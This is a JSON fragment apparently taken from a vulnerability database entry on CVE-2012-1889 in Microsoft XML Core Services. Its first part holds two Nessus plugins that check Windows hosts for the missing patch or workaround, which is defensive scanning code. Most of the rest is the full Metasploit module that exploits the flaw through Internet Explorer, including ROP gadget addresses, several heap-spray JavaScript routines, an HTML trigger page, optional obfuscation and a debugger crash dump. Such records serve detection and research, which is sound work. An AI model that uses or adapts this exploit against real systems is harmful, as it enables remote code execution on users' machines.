["CVE-2012-1889"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:xml_core_services"], "id": "SMB_NT_MS12-043.NASL", "href": "https://www.tenable.com/plugins/nessus/59906", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59906);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-1889\");\n script_bugtraq_id(53934);\n script_xref(name:\"MSFT\", value:\"MS12-043\");\n script_xref(name:\"MSKB\", value:\"2719985\");\n script_xref(name:\"MSKB\", value:\"2721691\");\n script_xref(name:\"MSKB\", value:\"2721693\");\n script_xref(name:\"MSKB\", value:\"2687324\");\n script_xref(name:\"MSKB\", value:\"2596856\");\n script_xref(name:\"MSKB\", value:\"2596679\");\n script_xref(name:\"MSKB\", value:\"2687497\");\n script_xref(name:\"MSKB\", 
value:\"2687627\");\n\n script_name(english:\"MS12-043: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479)\");\n script_summary(english:\"Checks the versions of Msxml3.dll, Msxml4.dll, and Msxml6.dll\");\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nXML Core Services.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft XML Core Services installed on the remote\nWindows host is affected by a remote code execution vulnerability\nthat could allow arbitrary code execution if a user views a specially\ncrafted web page using Internet Explorer.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2012/2719615\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:xml_core_services\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS12-043';\nkbs = make_list(\"2719985\", \"2721691\", \"2721693\", \"2687324\", \"2596856\", \"2596679\", \"2687497\", \"2687627\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1', win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (!is_accessible_share()) audit(AUDIT_SHARE_FAIL, 'is_accessible_share');\n\ncommonfiles = hotfix_get_commonfilesdir();\nif (commonfiles)\n msxml5_dir = commonfiles + '\\\\Microsoft Shared\\\\Office11';\n\nvuln = 0;\n\n# Windows 8 / Server 2012\nvuln += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"Msxml4.dll\", 
version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\n\n# Windows 7 / Server 2008 R2\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml3.dll\", version:\"8.110.7600.17036\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml3.dll\", version:\"8.110.7600.21227\", min_version:\"8.110.7600.21000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml3.dll\", version:\"8.110.7601.17857\", min_version:\"8.110.7601.17000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml3.dll\", version:\"8.110.7601.22012\", min_version:\"8.110.7601.22000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml6.dll\", version:\"6.30.7600.17036\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml6.dll\", version:\"6.30.7600.21227\", min_version:\"6.30.7600.21000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml6.dll\", version:\"6.30.7601.17857\", min_version:\"6.30.7601.17000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml6.dll\", version:\"6.30.7601.22012\", min_version:\"6.30.7601.22000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\n\n# Vista / Windows Server 2008\nvuln += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msxml3.dll\", version:\"8.100.5005.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msxml4.dll\", 
version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msxml6.dll\", version:\"6.20.5005.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\n\n# Windows 2003 and XP x64\nvuln += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msxml3.dll\", version:\"8.100.1052.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msxml6.dll\", version:\"6.20.2012.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721693\");\n\n# Windows XP\nvuln += hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Msxml3.dll\", version:\"8.100.1053.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Msxml6.dll\", version:\"6.20.2501.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\n\n# XML Core Services 5 (this could be one of three KBs - KB2687324, KB2596856, KB2596679)\n# Update: KBs KB2687324 and KB2596679 are replaced by KB2687627 and KB2687497 respectively.\nif (msxml5_dir)\n vuln += hotfix_is_vulnerable(path:msxml5_dir, file:\"Msxml5.dll\", version:\"5.20.1096.0\", min_version:\"5.0.0.0\", bulletin:bulletin);\n\nif (vuln > 0)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-29T13:43:30", "edition": 3, "description": "The remote host is missing the 
workaround referenced in KB 2719615.\n\nAn issue exists in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 when the application attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.", "published": "2012-06-13T00:00:00", "type": "nessus", "title": "MS KB2719615: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1889"], "cpe": ["cpe:/o:microsoft:windows"], "modified": "2017-08-30T00:00:00", "id": "SMB_KB2719615.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=59461", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59461);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:46 $\");\n\n script_cve_id(\"CVE-2012-1889\");\n script_bugtraq_id(53934);\n script_osvdb_id(82873);\n script_xref(name:\"EDB-ID\", value:\"19186\");\n script_xref(name:\"MSKB\", value:\"2719615\");\n\n script_name(english:\"MS KB2719615: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution\");\n script_summary(english:\"Checks for workaround\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through a web \nbrowser.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the workaround referenced in KB 2719615.\n\nAn issue exists in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 \nwhen the application attempts to access an object in memory that has \nnot been initialized, which may corrupt memory in such a way that an \nattacker could execute arbitrary code in the context of the logged-on\nuser.\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the Microsoft suggested workaround.\");\n 
script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2719615\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.microsoft.com/kb/2719615\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:W/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'windows/browser/msxml_get_definition_code_exec.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2012-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_ports(139, 445);\n script_require_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\n# This script has been disabled and is intended to be blank.\n# Disabled on 2012/07/10. 
Deprecated by smb_nt_ms12-043.nasl.\nexit(0, \"Deprecated - replaced by smb_nt_ms12-043.nasl\");\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif (hotfix_check_sp(xp:4, win2003:3, vista:3, win7:2) <= 0) exit(0, 'The host is not affected based on its version / service pack.');\nif ('Windows Embedded' >< get_kb_item_or_exit('SMB/ProductName'))\n audit(AUDIT_INST_VER_NOT_VULN, 'Windows Thin OS');\n\nvuln = 0;\n\nregistry_init();\nhandle = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nitems = make_list(\n \"{f300e352-12de-4e7f-ace3-a376874402b6}\",\n \"{29447369-6968-4e86-a208-603f6f0771a6}\",\n \"{06b2b7ed-809a-44e6-8538-ca0f5b74ecc4}\"\n);\n\nsystemroot = hotfix_get_systemroot();\npaths = make_list();\nforeach item (items)\n{\n path = get_registry_value(handle:handle, item:'SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\'+item+'\\\\DatabasePath');\n if (!isnull(path))\n paths = make_list(paths, path);\n else paths = make_list(paths, systemroot+'\\\\AppPatch\\\\Custom\\\\'+item+'.sdb');\n}\nRegCloseKey(handle:handle);\nclose_registry(close:FALSE);\n\n# Now make sure the files are in place\nforeach path (paths)\n{\n share = ereg_replace(pattern:'^([A-Za-z]):.*', replace:\"\\1$\", string:path);\n sdb = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\", string:path);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n close_registry(close:FALSE);\n debug_print('Failed to connect to the \\''+share+'\\'.');\n continue;\n }\n\n fh = CreateFile(\n file:sdb,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if 
(isnull(fh))\n vuln++;\n else\n CloseFile(handle:fh);\n close_registry(close:FALSE);\n}\nNetUseDel();\n\nif (vuln)\n{\n security_hole(port:port);\n exit(0);\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-13T00:08:04", "description": "This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution.\n", "published": "2012-06-16T00:26:33", "type": "metasploit", "title": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MSXML_GET_DEFINITION_CODE_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"6.0\",\n :ua_maxver => \"9.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :classid => \"{f6D90f11-9c73-11d3-b32e-00C04f990bb4}\",\n :method => \"definition\",\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption\",\n 'Description' => %q{\n This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'inking26', # 
Reliable exploitation\n 'binjo', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-1889' ],\n [ 'BID', '53934' ],\n [ 'OSVDB', '82873'],\n [ 'MSB', 'MS12-043'],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],\n [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],\n [ 'URL', 'https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # msxml3.dll 8.90.1101.0\n [ 'Automatic', {} ],\n [\n 'IE 6 on Windows XP SP3',\n {\n 'Offset' => '0x100',\n 'Rop' => nil,\n 'RandomHeap' => false\n }\n ],\n [\n 'IE 7 on Windows XP SP3 / Vista SP2',\n {\n 'Offset' => '0x100',\n 'Rop' => nil,\n 'RandomHeap' => false\n }\n ],\n [\n 'IE 8 on Windows XP SP3',\n {\n 'Rop' => :msvcrt,\n 'RandomHeap' => false,\n 'RopChainOffset' => '0x5f4',\n 'Offset' => '0x0',\n 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll\n }\n ],\n [\n 'IE 8 with Java 6 on Windows XP SP3',\n {\n 'Rop' => :jre,\n 'RandomHeap' => false,\n 'RopChainOffset' => '0x5f4',\n 'Offset' => '0x0',\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ],\n [\n 'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',\n {\n 'Rop' => :jre,\n 'RandomHeap' => false,\n 'RopChainOffset' => '0x5f4',\n 'Offset' => '0x0',\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ],\n [\n 'IE 9 with Java 6 on Windows 7 SP1',\n {\n 'Rop' => :jre,\n 'RandomHeap' => true,\n 'RopChainOffset' => 0x5FC,\n 'Offset' => '0x0',\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 
'2012-06-12',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\n return targets[1] #IE 6 on Windows XP SP3\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\n return targets[2] #IE 7 on Windows XP SP3\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7/\n return targets[2] #IE 7 on Windows Vista SP2\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\n return targets[3] #IE 8 on Windows XP SP3\n elsif agent =~ /NT 6\\.[01]/ and agent =~ /MSIE 8/\n return targets[5] #IE 8 on Windows 7 SP1/Vista SP2\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 9/\n return targets[6] #IE 9 on Windows 7 SP1\n else\n return nil\n end\n end\n\n def ret(t)\n case t['Rop']\n when :msvcrt\n return [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\n when :jre\n return [ 0x7c347f98 ].pack(\"V\") # RETN (ROP NOP) # msvcr71.dll\n end\n end\n\n def popret(t)\n case t['Rop']\n when :msvcrt\n return [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll\n when :jre\n return [ 0x7c376541 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcr71.dll\n end\n end\n\n def get_rop_chain(t)\n if t['RandomHeap']\n adjust = [ 0x0c0c0c0c ].pack(\"V\") # heap isn't filled with pointers to 0x0c0c0c0c\n adjust << ret(t)\n else\n adjust = ret(t)\n end\n\n adjust << popret(t)\n adjust << [ t['StackPivot'] ].pack(\"V\")\n adjust << ret(t) * 4 # first call to a \"ret\" because there is a good gadget in the stack :)\n\n # Both ROP chains generated by mona.py - See corelan.be\n case t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})\n\n else\n print_status(\"Using JRE ROP\")\n rop = generate_rop_payload('java','',{'pivot'=>adjust})\n end\n\n return 
rop\n end\n\n def get_easy_spray(t, js_code, js_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n\n spray = <<-JS\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n\n while (nops.length < 0x80000) nops += nops;\n\n var offset = nops.substring(0, #{t['Offset']});\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n\n heap_obj.gc();\n for (var z=1; z < 0x230; z++) {\n heap_obj.alloc(block);\n }\n\n JS\n\n return spray\n\n end\n\n\n def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n randnop2 = rand_text_alpha(rand(100) + 1)\n\n spray = <<-JS\n\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n var #{randnop2} = \"#{js_90_nops}\";\n var nops_90 = unescape(#{randnop2});\n var rop_chain = unescape(\"#{js_rop}\");\n\n while (nops.length < 0x80000) nops += nops;\n while (nops_90.length < 0x80000) nops_90 += nops_90;\n\n var offset = nops.substring(0, #{t['Offset']});\n var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);\n var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);\n\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n\n heap_obj.gc();\n for (var z=1; z < 0x230; z++) {\n heap_obj.alloc(block);\n }\n\n JS\n\n return spray\n\n end\n\n # Spray published by corelanc0d3r\n # Exploit writing tutorial part 11 : Heap Spraying Demystified\n # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\n def get_random_spray(t, js_rop, 
js_code, js_90_nops)\n\n spray = <<-JS\n\n function randomblock(blocksize)\n {\n var theblock = \"\";\n for (var i = 0; i < blocksize; i++)\n {\n theblock += Math.floor(Math.random()*90)+10;\n }\n return theblock;\n }\n\n function tounescape(block)\n {\n var blocklen = block.length;\n var unescapestr = \"\";\n for (var i = 0; i < blocklen-1; i=i+4)\n {\n unescapestr += \"%u\" + block.substring(i,i+4);\n }\n return unescapestr;\n }\n\n var heap_obj = new heapLib.ie(0x10000);\n\n var rop = unescape(\"#{js_rop}\");\n var code = unescape(\"#{js_code}\");\n var #{randnop2} = \"#{js_90_nops}\";\n var nops_90 = unescape(#{randnop2});\n\n while (nops_90.length < 0x80000) nops_90 += nops_90;\n\n var offset_length = #{t['RopChainOffset']};\n\n for (var i=0; i < 0x1000; i++) {\n var padding = unescape(tounescape(randomblock(0x1000)));\n while (padding.length < 0x1000) padding+= padding;\n var junk_offset = padding.substring(0, offset_length - code.length);\n var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\n heap_obj.alloc(sprayblock);\n }\n\n JS\n\n return spray\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n p = payload.encoded\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\n js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\n\n\n if not my_target['Rop'].nil?\n js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), 
Rex::Arch.endian(my_target.arch))\n end\n\n if my_target['RandomHeap']\n js = get_random_spray(my_target, js_rop, js_code, js_90_nops)\n elsif not my_target['Rop'].nil?\n js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)\n else\n js = get_easy_spray(my_target, js_code, js_nops)\n end\n\n js = heaplib(js, {:noobfu => true})\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n object_id = rand_text_alpha(4)\n\n html = <<-EOS\n <html>\n <head>\n <script>\n #{js}\n </script>\n </head>\n <body>\n <object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object>\n <script>\n var obj = document.getElementById('#{object_id}').object;\n var src = unescape(\"%u0c08%u0c0c\");\n while (src.length < 0x1002) src += src;\n src = \"\\\\\\\\\\\\\\\\xxx\" + src;\n src = src.substr(0, 0x1000 - 10);\n var pic = document.createElement(\"img\");\n pic.src = src;\n pic.nameProp;\n obj.definition(#{rand(999) + 1});\n </script>\n </body>\n </html>\n EOS\n\n html = html.gsub(/^ {4}/, '')\n\n print_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n\n end\nend\n\n=begin\n(e34.358): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350\neip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????\n\n\n0:008> r\neax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528\neip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 
efl=00010206\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????\n0:008> k\nChildEBP RetAddr\n020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4\n020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e\n020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa\n020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50\n020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa\n020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d\n020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\n020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\n020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98\n020bf590 633a77ff jscript!VAR::InvokeByName+0x135\n020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\n020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce\n020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989\n020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f\n020bf958 633891f1 jscript!CSession::Execute+0x175\n020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0\n020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a\n020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30\n020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/msxml_get_definition_code_exec.rb"}], "securityvulns": 